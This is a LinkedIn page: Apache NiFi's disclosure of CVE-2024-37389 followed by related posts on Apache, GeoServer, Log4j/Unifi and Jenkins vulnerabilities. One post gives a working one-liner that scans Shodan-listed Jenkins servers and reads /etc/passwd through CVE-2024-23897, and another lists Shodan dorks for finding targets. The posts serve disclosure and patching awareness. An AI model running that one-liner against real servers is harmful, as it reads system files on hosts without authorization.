The Apache NiFi Team has published CVE-2024-37389 related to improper neutralization of input in Parameter Context descriptions. Upgrading to Apache NiFi 2.0.0-M4 or 1.27.0 is the recommended mitigation. Thanks to Akbar Kustirama for finding and reporting the problem! https://lnkd.in/g4qatzVd
Apache NiFi’s Post
More Relevant Posts
-
#Vulnerability #ApacheNiFi PoC Exploit Released for Apache NiFi Code Execution Vulnerability (CVE-2023-34212)
PoC Exploit Released for Apache NiFi Code Execution Vulnerability (CVE-2023-34212)
https://securityonline.info
-
Dependency Confusion Vulnerability Found in Apache Project: This occurs when a private package fetches a similar public one, leading to exploit due to misconfigurations in package managers
Dependency Confusion Vulnerability Found in Apache Project
infosecurity-magazine.com
-
Geoserver CVE-2023-41877 was published yesterday, a path traversal vulnerability. I found this some time ago and explored the possibilities apart from disclosing information stored in server files. The advisory says that it could lead to RCE, and it is not just by getting credentials from files or whatever: abusing just this vulnerability and Geoserver is enough under certain circumstances. I decided to publish a little article about how to leverage RCE by just abusing this vulnerability. The idea is to encourage Geoserver administrators to apply the proper mitigation steps.
Exploiting GeoServer path traversal vulnerability (CVE-2023-41877)
blog.anthares101.com
-
🌐 Bridging Data Orchestration and Cybersecurity: A Must-Read from Jarek Potiuk! 🌐 This is to all my data network from back when I worked at Astronomer 😉 I'm thrilled to share an insightful article written by my former colleague that resonates deeply with my professional journey. Transitioning from data orchestration to cybersecurity, it's exciting to see these worlds intersect in meaningful ways. This piece delves into a recent security vulnerability within Apache Airflow, exploring the challenges and remediations in open-source development. From discovering a subtle typo in GitHub Actions to implementing strategic security enhancements, the article is a journey into the complexities of cybersecurity. 👉 Highly recommended for insights into the evolving landscape of tech security: https://lnkd.in/dVM2Jn3a #CyberSecurity #DataOrchestration #ApacheAirflow #TechInsight
Independent Open-Source Contributor and Advisor, Committer and PMC member of Apache Airflow, Member of the Apache Software Foundation, member of ASF Security Committee
If you are into Open-Source Security, this blog post describes the story of a security vulnerability reported to Apache Airflow - one that could potentially have gotten very bad. It shows the strength of The Apache Software Foundation security process as defined now, but also how individuals empowered by funding from Sovereign Tech Fund can add extra layers of protection and strengthen the release process even more. A bit of a cautionary tale for maintainers to pay attention to securing their release process, but also a hopeful view on emerging funding models that will put the security process front and center - especially in light of upcoming regulations in the EU and US. Thanks to Harish P for reporting the original issue.
Unraveling the Code: Navigating a CI/Release Security Vulnerability in Apache Airflow
medium.com
-
Exploiting Log4j Vulnerabilities in Unifi Software. Learn how to: - Gain reverse shell access - Add an administrative user to the Unifi MongoDB instance To automate this process we have released a GitHub repository to exploit the vulnerability: 🔗 https://lnkd.in/gQ-zpXeF Read the full article here: 👇 https://lnkd.in/g9YzVEBx
GitHub - puzzlepeaches/Log4jUnifi: Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more.
github.com
-
Multiple PoC exploits released for Jenkins flaw CVE-2024-23897: Multiple proof-of-concept (PoC) exploits for recently disclosed critical Jenkins vulnerability CVE-2024-23897 have been released. Researchers warn that several proof-of-concept (PoC) exploits targeting the recently disclosed critical Jenkins vulnerability, CVE-2024-23897, have been made public. Jenkins is the most popular open source automation server, it is maintained by CloudBees and the Jenkins community. The automation server supports developers […]
Multiple PoC exploits released for Jenkins flaw CVE-2024-23897
https://securityaffairs.com
-
Is the args4j vulnerability in Jenkins (CVE-2024-23897) the beginning of another log4j? https://lnkd.in/ge2Q9pKB
Arbitrary File Read in Jenkins via args4j (CVE-2024-23897)
travisgreen.net
-
Jenkins has recently released a security advisory on an unauthenticated file read vulnerability (CVE-2024-23897). The vulnerability was a result of a third-party library called args4j which was used to parse the commands from the Jenkins CLI utility. Here is a quick one-liner to identify the vulnerability among public Jenkins instances that are exposed on the internet. uncover -shodan "X-Jenkins"|httpx| xargs -I % sh -c 'echo %;java -jar jenkins-cli.jar -s %/ -http help 1 "@/etc/passwd";echo "-----------------------";exit 0;' Make sure you have the following tools installed -> https://lnkd.in/gUTtuaRP -> https://lnkd.in/gT75H4pE -> jenkins-cli utility Vulnerable instances would result in exposing the first line of the /etc/passwd file as an error message. Mitigation Steps -> Upgrade Jenkins to 2.442, LTS 2.426.3 -> As an immediate step we can disable the Jenkins CLI, more details here https://lnkd.in/gpbuARMA #vulnerability #cve #jenkins #security
-
Intern at FCRF | Web App Pentesting | CTF Player | Security Researcher 🐞 | B.Tech Student at GLA University
Some Shodan Dorks that might be useful in Bug Bounty 💻.
1. org:"target.com"
2. http.status:"<status_code>"
3. product:"<Product_Name>"
4. port:<Port_Number> "Service_Message"
5. port:<Port_Number> "Service_Name"
6. http.component:"<Component_Name>"
7. http.component_category:"<Component_Category>"
8. http.waf:"<firewall_name>"
9. http.html:"<Name>"
10. http.title:"<Title_Name>"
11. ssl.alpn:"<Protocol>"
12. http.favicon.hash:"<Favicon_Hash>"
13. net:"<Net_Range>" (for e.g. 104.16.100.52/32)
14. ssl.cert.subject.cn:"<Domain.com>"
15. asn:"<ASnumber>"
16. hostname:"<hostname>"
17. ip:"<IP_Address>"
18. all:"<Keyword>"
19. "Set-Cookie: phpMyAdmin"
20. "Set-Cookie: lang="
21. "Set-Cookie: PHPSESSID"
22. "Set-Cookie: webvpn"
23. "Set-Cookie:webvpnlogin=1"
24. "Set-Cookie:webvpnLang=en"
25. "Set-Cookie: mongo-express="
26. "Set-Cookie: user_id="
27. "Set-Cookie: phpMyAdmin="
28. "Set-Cookie: _gitlab_session"
29. "X-elastic-product: Elasticsearch"
30. "x-drupal-cache"
31. "access-control-allow-origin"
32. "WWW-Authenticate"
33. "X-Magento-Cache-Debug"
34. "kbn-name: kibana"
I break things to make them better—or worse. Can't guarantee though.
Thank you Apache NiFi Team for the swift action on the report. It's been a pleasure contributing to such a project 😁😁